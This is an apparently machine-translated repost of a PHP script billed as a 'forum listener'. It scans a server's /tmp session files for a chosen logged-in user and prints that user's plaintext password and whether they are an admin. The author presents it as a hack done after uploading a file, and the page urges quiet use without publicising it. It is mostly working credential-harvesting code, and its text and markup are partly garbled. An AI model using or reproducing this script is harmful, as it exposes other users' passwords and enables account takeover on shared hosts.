ホームページ >php教程 >php手册 >セッション内容を閲覧する機能

セッション内容を閲覧する機能

WBOY
WBOYオリジナル
2016-06-13 12:43:101296ブラウズ

この関数を記述できる理由は、主に Web サイトのセッション構造が次のように明確であるためです: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:" 1" は、セッションが保存されている場所も知っており、ファイルをアップロードすることもできるので、そのときにちょっとしたハッキン​​グをしました。オンラインの友達のパスワードが一目でわかります (笑):
function submit1( ){
global $username;
print "フォーラム リスナー"
$i=0; "|| $username=="Tasm")
{
print "あなたも怪しいですか? 私もチェックしていますか?";
return;
}
$path="/ tmp /";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)== " sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ ary =explode(";",$ary[0]);
$name=explode(":",$ary[0]);
if($name[2]==""". $ username."""){
$passwd=explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print " ユーザーのペン名: ".$name[2]。"
使用パスワード: ".$passwd[2]。"
使用モード:";
if($mode[1]= =1 )
print "admin";
else
print "一般ユーザー"
print"

その他 パスワードは道徳に反しています。何とかしてください
";
$i=1;
break;
}}}}
if(!$i)
print "User :".$username." 本当にオンラインですか?もう一度お試しください。これ以上スペースを入力しないでください。 ";
$d->close();
}

function login(){
?>


フォーラム リスナー
>




オンラインでユーザーを見つけてそのパスワードを確認したい場合はどうすればよいですか?

を使用してください。 ;tr> 厳粛に宣言します: このプログラムは無料のプログラムであり、それによって生じた損失については責任を負いません ただし、この問題はブロックされる可能性があります。さあ、宣伝せずにこっそり使ってみましょう。

確認したいユーザー名:

type="submit" name="submit1" value="上記の内容に同意します。検索を開始します">
/p>


}
-----main()
if($submit1)
submit1();
else
?>

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。